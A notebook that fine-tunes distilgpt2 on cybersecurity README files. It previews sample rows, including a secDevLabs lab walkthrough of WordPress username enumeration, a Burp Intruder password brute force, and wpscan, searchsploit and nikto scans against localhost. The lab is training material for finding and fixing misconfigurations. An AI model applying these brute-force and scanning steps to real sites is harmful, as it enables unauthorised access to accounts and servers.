The project is hosted by Hyperledger.\n- [Geth](https://geth.ethereum.org/docs/) - Go client\n- [Erigon](https://github.com/ledgerwatch/erigon) - a mostly Go implementation of Ethereum client built on the efficiency frontier\n- [Akula](https://github.com/akula-bft/akula) - Rust implementation\n- [Nethermind](https://github.com/NethermindEth/nethermind) - .NET Core client\n- [Infura](https://infura.io/) - A managed service providing Ethereum client standards-compliant APIs\n- [Trinity](https://trinity.ethereum.org/) - Python client using [py-evm](https://github.com/ethereum/py-evm)\n- [Ethereumjs](https://github.com/ethereumjs/ethereumjs-client) - JS client using [ethereumjs-vm](https://github.com/ethereumjs/ethereumjs-vm)\n- [Seth](https://github.com/dapphub/dapptools/tree/master/src/seth) - Seth is an Ethereum client tool—like a ""MetaMask for the command line""\n- [Quorum](https://github.com/jpmorganchase/quorum) - A permissioned implementation of Ethereum supporting data privacy by [JP Morgan](https://jpmorgan.com/quorum)\n- [Awesome Quorum](https://github.com/ConsenSys/awesome-quorum) - A curated list of awesome softwares, libraries, tools and more to build on ConsenSys Quorum.\n- [Chainstack](https://chainstack.com/) - A managed service providing shared and dedicated Geth nodes\n- [QuikNode](https://quiknode.io/) - Blockchain developer cloud with API access and node-as-a-service.\n- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain\n\n#### Storage\n\n- [DB3 Network](https://github.com/dbpunk-labs/db3) - Decentralized Firebase Firestore Alternative.\n- [IPFS](https://ipfs.io/) - Decentralised storage and file referencing\n- [Mahuta](https://github.com/ConsenSys/Mahuta) - IPFS Storage service with added search capability, formerly IPFS-Store\n- [OrbitDB](https://github.com/orbitdb/orbit-db) - Decentralised database on top of IPFS\n- [JS IPFS API](https://github.com/ipfs/js-ipfs-http-client) - A client library for 
the IPFS HTTP API, implemented in JavaScript\n- [TEMPORAL](https://github.com/RTradeLtd/Temporal) - Easy to use API into IPFS and other distributed/decentralised storage protocols\n- [PINATA](https://pinata.cloud) - The Easiest Way to Use IPFS\n- [Swarm](https://swarm-gateways.net/) - Distributed storage platform and content distribution service, a native base layer service of the Ethereum web3 stack\n- [Infura](https://infura.io/) - A managed IPFS API Gateway and pinning service\n- [Aleph.im](https://aleph.im/) - an offchain incentivized peer-to-peer cloud project (database, file storage, computing and DID) compatible with ETH and IPFS.\n- [Fleek](https://fleek.co/) - similar to netlify but uses ipfs for hosting websites.\n\n#### Bootstrap/Out-of-Box tools\n\n- [Truffle boxes](https://trufflesuite.com/boxes) - Packaged components for the Ethereum ecosystem\n- [Create Eth App](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered frontend apps with one command\n- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container\n- [Testchains](https://github.com/Nethereum/TestChains) - Pre-configured .NET devchains for fast response (PoA)\n- [Blazor/Blockchain Explorer](https://github.com/Nethereum/NethereumBlazor) - Wasm blockchain explorer (functional sample)\n- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes\n- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks\n- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks\n- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. 
Great for PoCs and testing\n- [Cheshire](https://github.com/endless-nameless-inc/cheshire) - A local sandbox implementation of the CryptoKitties API and smart contracts, available as a Truffle Box\n- [aragonCLI](https://github.com/aragon/aragon-cli) - aragonCLI is used to create and develop Aragon apps and organizations.\n- [ColonyJS](https://github.com/JoinColony/colonyJS) - JavaScript client that provides an API for interacting with the Colony Network smart contracts.\n- [ArcJS](https://github.com/daostack/arc.js) - Library that facilitates javascript application access to the DAOstack Arc ethereum smart contracts.\n- [Onboard.js](https://blocknative.com/onboard) - Blocknative Onboard is the quick and easy way to add multi-wallet support to your project. With built-in modules for more than 20 unique hardware and software wallets, Onboard saves you time and headaches.\n- [web3-react](https://github.com/NoahZinsmeister/web3-react) - React framework for building single-page Ethereum dApps\n\n#### Ethereum ABI (Application Binary Interface) tools\n\n- [ABI decoder](https://github.com/ConsenSys/abi-decoder) - library for decoding data params and events from Ethereum transactions\n- [ABI-gen](https://github.com/0xProject/0x-monorepo/tree/development/packages/abi-gen) - Generate Typescript contract wrappers from contract ABI's.\n- [Ethereum ABI UI](https://github.com/hiddentao/ethereum-abi-ui) - Auto-generate UI form field definitions and associated validators from an Ethereum contract ABI\n- [headlong](https://github.com/esaulpaugh/headlong/) - type-safe Contract ABI and Recursive Length Prefix library in Java\n- [EasyDapper](https://www.easydapper.com) - Generate dapps from Truffle artifacts, deploy contracts on public/private networks, offers live customizable public page to interact with contracts.\n- [One Click dApp](https://oneclickdapp.com) - Instantly create a dApp at a unique URL using the ABI.\n- [Truffle Pig](https://npmjs.com/package/trufflepig) - a 
development tool that provides a simple HTTP API to find and read from Truffle-generated contract files, for use during local development. Serves fresh contract ABIs over http.\n- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.\n- [Nethereum-CodeGenerator](https://github.com/StefH/Nethereum-CodeGenerator) - A web based generator which creates a Nethereum based C# Interface and Service based on Solidity Smart Contracts.\n\n# Testing Tools\n\n- [Solidity code coverage](https://github.com/0xProject/0x-monorepo/tree/development/packages/sol-coverage) - Solidity code coverage tool\n- [Solidity coverage](https://github.com/sc-forks/solidity-coverage) - Alternative code coverage for Solidity smart-contracts\n- [Solidity function profiler](https://github.com/EricR/sol-function-profiler) - Solidity contract function profiler\n- [Sol-profiler](https://github.com/Aniket-Engg/sol-profiler) - Alternative and updated Solidity smart contract profiler\n- [Espresso](https://github.com/hillstreetlabs/espresso) - Speedy, parallelised, hot-reloading solidity test framework\n- [Eth tester](https://github.com/ethereum/eth-tester) - Tool suite for testing Ethereum applications\n- [Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network\n- [Hevm](https://github.com/dapphub/dapptools/tree/master/src/hevm) - The hevm project is an implementation of the Ethereum virtual machine (EVM) made specifically for unit testing and debugging smart contracts\n- [Ethereum graph debugger](https://github.com/fergarrui/ethereum-graph-debugger) - Solidity graphical debugger\n- [Tenderly CLI](https://github.com/Tenderly/tenderly-cli) - Speed up your development with human readable stack traces\n- 
[Solhint](https://github.com/protofire/solhint) - Solidity linter that provides security, style guide and best practice rules for smart contract validation\n- [Ethlint](https://github.com/duaraghav8/Ethlint) - Linter to identify and fix style & security issues in Solidity, formerly Solium\n- [Decode](https://github.com/hacker-DOM/decode) - npm package which parses tx's submitted to a local testrpc node to make them more readable and easier to understand\n- [truffle-assertions](https://github.com/rkalis/truffle-assertions) - An npm package with additional assertions and utilities used in testing Solidity smart contracts with truffle. Most importantly, it adds the ability to assert whether specific events have (not) been emitted.\n- [Psol](https://github.com/Lamarkaz/psol) - Solidity lexical preprocessor with mustache.js-style syntax, macros, conditional compilation and automatic remote dependency inclusion.\n- [solpp](https://github.com/merklejerk/solpp) - Solidity preprocessor and flattener with a comprehensive directive and expression language, high precision math, and many useful helper functions.\n- [Decode and Publish](https://flightwallet.github.io/decode-eth-tx/) – Decode and publish raw ethereum tx. Similar to https://live.blockcypher.com/btc-testnet/decodetx/\n- [Doppelgänger](https://getdoppelganger.io/) - a library for mocking smart contract dependencies during unit testing.\n- [rocketh](https://github.com/wighawag/rocketh) - A simple lib to test ethereum smart contract that allow to use whatever web3 lib and test runner you choose.\n- [pytest-cobra](https://github.com/cobraframework/pytest-cobra) - PyTest plugin for testing smart contracts for Ethereum blockchain.\n- [ERCx](https://ercx.runtimeverification.com) - Testing tool with a Web interface to test conformance and properties of ERC-20 tokens. 
Based on Foundry forge.\n\n#### Transaction Visualization, Scoring & Tracking:\n\n- Check out Author's methodology, carefully read all parts of [thread](https://twitter.com/officer_cia/status/1493395239905734667?s=20&t=rFmBq_f9juLPNWslwrnB7Q)\n- Follow my project: [On-Chain Investigations Tools List](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List)\n\n#### What's next?\n\n- [Take a look](https://telegra.ph/Solidity-Tutorials-12-21)\n- [Carefully check out](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [Work](https://t.me/s/officer_cia/700)\n\n#### Work...?\n\n- [Crypto Jobs List - Main](https://docs.google.com/spreadsheets/d/1AfCSrl98bNGE5_Iq-N6zYx5xmuCBpoEkiBCDQD5Keh4/edit#gid=0)\n- [web3.smsunarto.com](https://web3.smsunarto.com)\n- [2023 Global Crypto Events & Hackathons](https://docs.google.com/spreadsheets/d/1uRB5lt67Eoxfattljko7IvuQvpqkLt66YpOev9XJ22o/edit?usp=sharing)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Jobsincrypto](https://twitter.com/jobsincrypto)\n- [CryptoJobsList](https://twitter.com/CryptoJobsList)\n- [LobsterHR](https://t.me/lobsters_hr)\n- [DeveloperDAO](https://twitter.com/developer_dao)\n- [LidoGrants](https://twitter.com/LidoGrants)\n- [GitCoin](https://twitter.com/gitcoin)\n- [anonfriendly.com](http://anonfriendly.com)\n- [Web3grants](https://twitter.com/web3grants)\n- [hackathons.live](https://hackathons.live)\n- [hackenproof.com](http://hackenproof.com)\n- [bbscope](https://github.com/sw33tLie/bbscope)\n- [immunefi.com](https://immunefi.com)\n- [code4rena.com](https://code4rena.com)\n- [sherlock.xyz](https://www.sherlock.xyz)\n- [spearbit.com](https://spearbit.com)\n- [Web3SecurityDAO](https://twitter.com/Web3SecurityDAO)\n- [WHITE HAT DAO](https://twitter.com/White_Hat_DAO)\n- [Hats.Finance](https://twitter.com/HatsFinance)\n- [crypto-jobs-fyi.github.io](https://crypto-jobs-fyi.github.io/web/)\n- 
[auditjobs.xyz](https://auditjobs.xyz/)\n- [intropia.io/hire](https://intropia.io/hire)\n- [www.jobstash.xyz](https://www.jobstash.xyz)\n- [frontrunnrs.xyz](https://frontrunnrs.xyz)\n- [www.jobprotocol.xyz](https://www.jobprotocol.xyz)\n\n## Support Me:\n\nSupport is **very** important to me, with it I can do what I love - educating DeFi & Crypto users :sparkling_heart: First, a few words, dear friends... I want to thank everyone who sent me donations!\n\n[![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap)\n\nThe best thing is to support me directly by donating to my address on Ethereum Main-net or any of the compatible networks or to any address from the list below:\n\n- **[0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A)** — ERC20 & ETH [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth)\n\n- **[17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU)** - BTC\n\n- **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds** - Monero XMR \n\n- You can also support me by minting one of my [Mirror articles NFTs](https://officercia.mirror.xyz/)!\n\n#\n\n- [Check out my Telegram Channel](https://t.me/officer_cia)\n- [Follow my Twitter](https://twitter.com/officer_cia)\n- [Track all my activities](https://t.me/officer_cia/296)\n- [All my Socials](https://t.me/officer_cia/296)\n\n##\n\n**Thank you! Stay safe!**\n"
8,"# BugBounty.zip :beetle: :moneybag:\n\nWelcome to BugBounty.zip, a collection of tools aimed at making your bug hunting experience smoother and more efficient.\n\n\n## Tools :wrench:\nHere's a brief overview of the tools BugBountyZIP provides:\n\n1. **Add HTTPS:** Automatically adds HTTPS to domain list.\n2. **Remove a Word:** Helps you delete specific words from your list.\n3. **Replace a Word:** Allows you to replace specific words in your list.\n4. **Remove Duplicates:** Removes duplicate entries in your list.\n5. **Extract Endpoints:** Enables you to extract endpoints from your URL lists.\n6. **Extract Parameters:** Helps to extract parameters from URL strings.\n7. **Open Multiple URLs:** Opens multiple URLs at once.\n8. **OTP Generator:** A one-time password generator tool.\n9. **UltraSoundSource Scan:** Scans the input source code or JavaScript file to find endpoints, parameters, and domains.\n10. **Append** a specific path to entered domains/URLs.\n11. **Rapid-Hand** for faster payload injection.\n12. **Hope** a tool to scan URLs for potential vulnerable parameters, with a focus on OWASP's top 25 vulnerabilities.\n13. **Evidence** a screen recorder with audio and mic support. Recordings are saved directly to the user's local machine.\n\n## Usage :computer:\nSimply navigate to [BugBounty.zip](https://BugBounty.zip) to start using the tools.\n\n## Contribution :handshake:\nWe welcome any contributions! If you wish to contribute, please create an issue to discuss what you would like to change or improve.\n\n## Sponsors :money_with_wings:\nYour support means a lot to us. It helps us dedicate more time to maintaining this project and continue adding valuable tools. Check out the sponsorship tiers and consider becoming a sponsor. \n\n\n[![""Buy Me A Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/BugBounty.ZIP)\n\n## License :page_with_curl:\nThis project is licensed under the MIT License. 
See `LICENSE` for more information.\n\n\n"
9,"# Vulnerable Wordpress Misconfig\n\n<p align=""center"">\n <img src=""images/banner.png""/>\n</p>\n\nThis is a simple Wordpress web application that contains an example of a Security Misconfiguration vulnerability and its main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabilities intentionally installed on SecWeb.\n\n## Index\n\n- [Definition](#what-is-security-misconfiguration)\n- [Setup](#setup)\n- [Attack narrative](#attack-narrative)\n- [Objectives](#secure-this-app)\n- [Solutions](#pr-solutions)\n- [Contributing](#contributing)\n\n## What is Security Misconfiguration?\n\nSecurity misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.\n\nThe main goal of this app is to discuss how **Security Misconfiguration** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.\n\n## Setup\n\nTo start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:\n\n```sh\ncd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress\n```\n\n```sh\nmake install\n```\n\nThen simply visit [localhost:8000][app] ! 😆\n\n## Get to know the app 📄\n\nTo properly understand how this application works, you can try to:\n\n- Visit its homepage!\n\n## Attack narrative\n\nNow that you know the purpose of this app, what could go wrong? 
The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜\n\n### 👀\n\n#### Verbose error message allows for username enumeration\n\nIt's possible to reach the site through the HTTP port 8000, as shown by the image below:\n\n<p align=""center"">\n <img src=""images/banner.png""/>\n</p>\n\nHaving a closer look at what's written bellow `SECWEB` we have a sign that the site might be using the WordPress CMS. We can confirm that suspicion by trying to access the `/wp-admin` page. As we can see from the image below, our suspicion is confirmed:\n\n <p align=""center"">\n <img src=""images/attack1.png""/>\n</p>\n\nAn attacker could try to log in with the username: `admin` and realize, through the error message, that `admin` is a valid user, as depicted by the image below:\n\n <p align=""center"">\n <img src=""images/attack2.png""/>\n</p>\n\n### 🔥\n\nAt this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below:\n\n <p align=""center"">\n <img src=""images/attack10.png""/>\n</p>\n\nIn the `Positions` tab, all fields must be cleared first via the `Clear §` button. To set `pwd` to change according to each password from our dictionary wordlist, simply click on `Add §` button after selecting it:\n\n <p align=""center"">\n <img src=""images/attack11.png""/>\n</p>\n\nIf a valid password is found, the application may process new cookies and eventually redirect the flow to other pages. 
To guarantee that the brute force attack follows this behavior, set `Always` into `Follow Redirections` options in the `Options` tab, as shown below:\n\n<p align=""center"">\n <img src=""images/attack13.png""/>\n</p>\n\nIn `Payloads` tab, simply choose the wordlist from `Load...` option and then the attack may be performed via the `Start attack` button:\n\n <p align=""center"">\n <img src=""images/attack12.png""/>\n</p>\n\nAfter sending at around 200 requests to try and obtain a valid admin password, it is possible to see from the image below that the app redirected us when the password `password` was used, thus giving us evidence that it might be the `admin` password.\n\n <p align=""center"">\n <img src=""images/attack3.png""/>\n</p>\n\nThe suspicion was confirmed when trying to log in with these credentials. As shown below:\n\n <p align=""center"">\n <img src=""images/attack3.1.png""/>\n</p>\n\n---\n\n### 👀\n\n#### Outdated WordPress is vulnerable to an authenticated arbitrary file deletion\n\nNow that we know we're dealing with a WordPress, we can use the [WPScan] tool to perform a sweep in the app in search for known vulnerabilities. The following command can be used to install it:\n\n```sh\nbrew install wpscan\n```\n\nAnd then use this command to start a new simple scan:\n\n```sh\nwpscan -u localhost:8000\n```\n\n <p align=""center"">\n <img src=""images/attack4.png""/>\n</p>\n\n### 🔥\n\nAs seen from the image above, the tool found out that the CMS version is outdated and vulnerable to an Authenticated Arbitrary File Deletion. 
By using [searchsploit] tool an attacker could find a [malicious code] to exploit this vulnerability.\n\nTo install this tool, simply type the following in your OSX terminal:\n\n```sh\n⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts'\n\nbrew install exploitdb\n```\n\nThen simply search for the version of the CMS found:\n\n```sh\nsearchsploit wordpress 4.9.6\n```\n\n <p align=""center"">\n <img src=""images/attack5.png""/>\n</p>\n\n---\n\n## 👀\n\n#### Security misconfiguration allows for a browseable directory on the server\n\nBy having another look at the results from [WPScan], it's possible to see that the tool found a browseable directory in the app: `/wp-content/uploads/`, as we can see from the image below:\n\n <p align=""center"">\n <img src=""images/attack6.png""/>\n</p>\n\n## 🔥\n\nWe can confirm that the directory is browseable by accessing it through a web browser, as shown by the following image:\n\n <p align=""center"">\n <img src=""images/attack7.png""/>\n</p>\n\n---\n\n## 👀\n\n#### Misconfigured headers give away unnecessary information about the server\n\nUsing [Nikto] tool to perform a security check scan, it's possible to see that there are multiple points of attention regarding security headers.\n\nTo install it, you can use the following command in your OSX terminal:\n\n```sh\nbrew install nikto\n```\n\nThen scan the web app using:\n\n```sh\nnikto -h http://localhost:8000/\n```\n\n <p align=""center"">\n <img src=""images/attack8.png""/>\n</p>\n\nNow, by doing the following curl command to check the HTTP headers of the application, we can confirm that it indeed exposes the PHP version installed, as shown by the image below:\n\n <p align=""center"">\n <img src=""images/attack9.png""/>\n</p>\n\n---\n\n## Secure this app\n\nHow would you mitigate this vulnerability? 
After your changes, an attacker should not be able to:\n\n- See verbose error messages\n- Sign in with default credentials\n- See verbose tokens\n- Find an outdated CMS version\n\nNote: In this particular app, due to how it works, you can simply write down the changes you would make to mitigate those vulnerabilities and submit it as a pull request.\n\n## PR solutions\n\n[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Vuln+Wordpress+Misconfig%22)!\n\n## Contributing\n\nWe encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉\n\n[docker install]: https://docs.docker.com/install/\n[docker compose install]: https://docs.docker.com/compose/install/\n[app]: http://localhost:8000\n[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt\n[wpscan]: https://wpscan.org/\n[malicious code]: https://www.exploit-db.com/exploits/44949\n[nikto]: https://cirt.net/Nikto2\n[searchsploit]: https://www.exploit-db.com/searchsploit\n"


As we can see, some of the texts are a full paragraph of a Wikipedia article while others are just titles or empty lines.

# **Preprocess**

In [11]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("bert-base-cased")


def tokenize_function(examples):
    return tokenizer(examples["text"], padding="max_length", truncation=True)


tokenized_datasets = dataset.map(tokenize_function, batched=True)


In [13]:
from transformers import AutoModelForSequenceClassification

model = AutoModelForSequenceClassification.from_pretrained("bert-base-cased", num_labels=5)

Some weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-cased and are newly initialized: ['classifier.bias', 'classifier.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


In [14]:
from transformers import TrainingArguments

training_args = TrainingArguments(output_dir="test_trainer")

## Causal Language modeling

For causal language modeling (CLM) we are going to take all the texts in our dataset and concatenate them after they are tokenized. Then we will split them into examples of a certain sequence length. This way the model will receive chunks of contiguous text that may look like:
```
part of text 1
```
or
```
end of text 1 [BOS_TOKEN] beginning of text 2
```
depending on whether they span over several of the original texts in the dataset or not. The labels will be the same as the inputs, shifted to the left.
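
The concatenate-and-split step described above, as an added example that is not part of the original notebook. It uses plain Python lists so it runs offline; the token ids, the separator id `EOS_ID` and all function names are constructed for illustration, and the one-position shift between inputs and labels is written out explicitly.

```python
from itertools import chain

EOS_ID = 0  # constructed separator id; a real tokenizer supplies its own

# Constructed sample: three already-tokenized texts of different lengths.
DOCS = [
    [11, 12, 13, 14, 15],
    [21, 22, 23],
    [31, 32, 33, 34, 35, 36],
]


def concat_with_separator(docs, sep_id=EOS_ID):
    """Join tokenized texts into one stream, with a separator after each text."""
    return list(chain.from_iterable(doc + [sep_id] for doc in docs))


def split_into_blocks(stream, block_size):
    """Cut the stream into full blocks; the short tail at the end is dropped."""
    usable = (len(stream) // block_size) * block_size
    return [stream[i:i + block_size] for i in range(0, usable, block_size)]


def build_clm_examples(docs, block_size, sep_id=EOS_ID):
    """Build examples whose labels are a copy of input_ids."""
    blocks = split_into_blocks(concat_with_separator(docs, sep_id), block_size)
    return [{"input_ids": block, "labels": list(block)} for block in blocks]


def next_token_pairs(example):
    """Return (context token, target token) pairs after the one-position shift.

    Position i of the input is scored against position i + 1 of the labels,
    so the last input token has no target inside the block.
    """
    ids, labels = example["input_ids"], example["labels"]
    return list(zip(ids[:-1], labels[1:]))


def spans_boundary(example, sep_id=EOS_ID):
    """True when a separator sits before the last position of the block,
    meaning the block holds the end of one text and the start of the next."""
    return sep_id in example["input_ids"][:-1]


if __name__ == "__main__":
    for example in build_clm_examples(DOCS, block_size=4):
        kind = "spans two texts" if spans_boundary(example) else "single text"
        print(example["input_ids"], kind, next_token_pairs(example))
```
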

We will use the [`distilgpt2`](https://huggingface.co/distilgpt2) model for this example. You can pick any of the checkpoints listed [here](https://huggingface.co/models?filter=causal-lm) instead:

In [15]:
model_checkpoint = "distilgpt2"

To tokenize all our texts with the same vocabulary that was used when training the model, we have to download a pretrained tokenizer. This is all done by the `AutoTokenizer` class:

In [16]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)

We can now call the tokenizer on all our texts. This is very simple, using the [`map`](https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map) method from the Datasets library. First we define a function that calls the tokenizer on our texts:

In [17]:
def tokenize_function(examples):
    return tokenizer(examples["text"])

Then we apply it to all the splits in our `datasets` object, using `batched=True` and 4 processes to speed up the preprocessing. We won't need the `text` column afterward, so we discard it.

In [18]:
tokenized_datasets = dataset.map(tokenize_function, batched=True, num_proc=4, remove_columns=["text"])

If we now look at an element of our datasets, we will see the text has been replaced by the `input_ids` the model will need:

In [19]:
tokenized_datasets["train"][1]

Now for the harder part: we need to concatenate all our texts together then split the result in small chunks of a certain `block_size`. To do this, we will use the `map` method again, with the option `batched=True`. This option actually lets us change the number of examples in the datasets by returning a different number of examples than we got. This way, we can create our new samples from a batch of examples.

First, we grab the maximum length our model was pretrained with. This might be a bit too big to fit in your GPU RAM, so here we take a bit less at just 128.

In [20]:
# block_size = tokenizer.model_max_length
block_size = 128

Then we write the preprocessing function that will group our texts:

In [21]:
def group_texts(examples):
    # Concatenate all texts.
    concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
    total_length = len(concatenated_examples[list(examples.keys())[0]])
    # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
    # customize this part to your needs.
    total_length = (total_length // block_size) * block_size
    # Split by chunks of max_len.
    result = {
        k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
        for k, t in concatenated_examples.items()
    }
    result["labels"] = result["input_ids"].copy()
    return result

First note that we duplicate the inputs for our labels. This is because the models of the 🤗 Transformers library apply the shifting to the right, so we don't need to do it manually.

Also note that by default, the `map` method will send a batch of 1,000 examples to be treated by the preprocessing function. So here, we will drop the remainder to make the concatenated tokenized texts a multiple of `block_size` every 1,000 examples. You can adjust this behavior by passing a higher batch size (which will also be processed slower). You can also speed up the preprocessing by using multiprocessing:

In [22]:
lm_datasets = tokenized_datasets.map(
    group_texts,
    batched=True,
    batch_size=1000,
    num_proc=4,
)
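
The effect of the per-batch remainder drop described above, as an added example that is not part of the original notebook: it runs the notebook's `group_texts` logic on constructed token ids with a `block_size` of 4. `map_batched` and `DOCS` are hypothetical names, and `map_batched` is only a stand-in for `Dataset.map(batched=True)`.

```python
# Added example: constructed token ids, no tokenizer or model download needed.
BLOCK_SIZE = 4  # small stand-in for the notebook's block_size = 128


def group_texts(examples, block_size=BLOCK_SIZE):
    """Same logic as the notebook's group_texts, with block_size as a parameter."""
    concatenated = {k: sum(examples[k], []) for k in examples}
    total_length = len(concatenated["input_ids"])
    total_length = (total_length // block_size) * block_size  # drop the remainder
    result = {
        k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
        for k, t in concatenated.items()
    }
    result["labels"] = result["input_ids"].copy()
    return result


def map_batched(rows, batch_size, block_size=BLOCK_SIZE):
    """Hypothetical stand-in for Dataset.map(batched=True): each batch is grouped alone."""
    chunks, dropped = [], 0
    for start in range(0, len(rows), batch_size):
        batch = rows[start : start + batch_size]
        grouped = group_texts({"input_ids": batch}, block_size)["input_ids"]
        chunks.extend(grouped)
        # Tokens that did not fill a whole block in this batch are lost.
        dropped += sum(len(r) for r in batch) - block_size * len(grouped)
    return chunks, dropped


# Constructed corpus: five "documents" of 3, 3, 2, 5 and 3 token ids (16 in total).
# The hundreds digit marks which document a token came from.
DOCS = [
    [101, 102, 103],
    [201, 202, 203],
    [301, 302],
    [401, 402, 403, 404, 405],
    [501, 502, 503],
]

if __name__ == "__main__":
    for bs in (2, 5):
        chunks, dropped = map_batched(DOCS, batch_size=bs)
        print(f"batch_size={bs}: {len(chunks)} chunks, {dropped} tokens dropped")
        for chunk in chunks:
            print("   ", chunk)
```

With these constructed inputs, batches of 2 keep 2 chunks and drop 8 of the 16 tokens, while a single batch of 5 keeps 4 chunks and drops none; the second chunk of the larger batch spans documents 2 and 3.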

And we can check our datasets have changed: now the samples contain chunks of `block_size` contiguous tokens, potentially spanning over several of our original texts.

In [23]:
tokenizer.decode(lm_datasets["train"][1]["input_ids"])

'.io/github/license/harisqazi1/Cybersecurity)](https://github.com/harisqazi1/Cybersecurity/blob/main/LICENSE)\n\n</p>\n\n# Cybersecurity Document\nThis document is meant to be a Swiss Army Knife for entry level Cybersecurity jobs and to learn hacking skills. A work in progress, so if you see mistakes, please mention it in the "Issues" section. \n\nNOTE: I DO NOT OWN ANY OF THIS INFORMATION. THIS IS JUST MEANT TO BE A COMPILATION OF VARIOUS'

Now that the data has been cleaned, we're ready to instantiate our `Trainer`. We will need a model:

In [24]:
from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained(model_checkpoint)

And some `TrainingArguments`:

In [25]:
from transformers import TrainingArguments

In [26]:
model_name = model_checkpoint.split("/")[-1]
training_args = TrainingArguments(
    f"{model_name}-finetuned-cybersecurity_readme",
    evaluation_strategy = "epoch",
    learning_rate=2e-5,
    weight_decay=0.01,
    push_to_hub=True,
)

The last argument sets everything up so we can push the model to the [Hub](https://huggingface.co/models) regularly during training. Remove it if you didn't follow the installation steps at the top of the notebook. If you want to save your model locally under a name that is different from the name of the repository it will be pushed to, or if you want to push your model under an organization and not your namespace, use the `hub_model_id` argument to set the repo name (it needs to be the full name, including your namespace: for instance `"sgugger/gpt-finetuned-wikitext2"` or `"huggingface/gpt-finetuned-wikitext2"`).

In [27]:
# !pip install transformers
from transformers.trainer import Trainer

print(Trainer.__init__.__doc__)

None


In [28]:
small_train_dataset = lm_datasets["train"].shuffle(seed=42).select(range(1000))
small_eval_dataset = lm_datasets["validation"].shuffle(seed=42).select(range(1000))

We pass along all of those to the `Trainer` class:

In [29]:
# trainer = Trainer(
#     model=model,
#     args=training_args,
#     train_dataset=lm_datasets["train"],
#     eval_dataset=lm_datasets["validation"],
# )
trainer = Trainer(
    model=model,
    args=training_args,
    train_dataset=small_train_dataset,
    eval_dataset=small_eval_dataset,
)

And we can train our model:

In [30]:
trainer.train()

Epoch,Training Loss,Validation Loss
1,No log,3.03301
2,No log,2.990992
3,No log,2.986135


TrainOutput(global_step=375, training_loss=3.3700319010416666, metrics={'train_runtime': 689.4567, 'train_samples_per_second': 4.351, 'train_steps_per_second': 0.544, 'total_flos': 97986281472000.0, 'train_loss': 3.3700319010416666, 'epoch': 3.0})

Once the training is completed, we can evaluate our model and get its perplexity on the validation set like this:

In [31]:
import math
eval_results = trainer.evaluate()
print(f"Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

Perplexity: 19.81


You can now upload the result of the training to the Hub by executing this instruction:

In [32]:
trainer.push_to_hub()

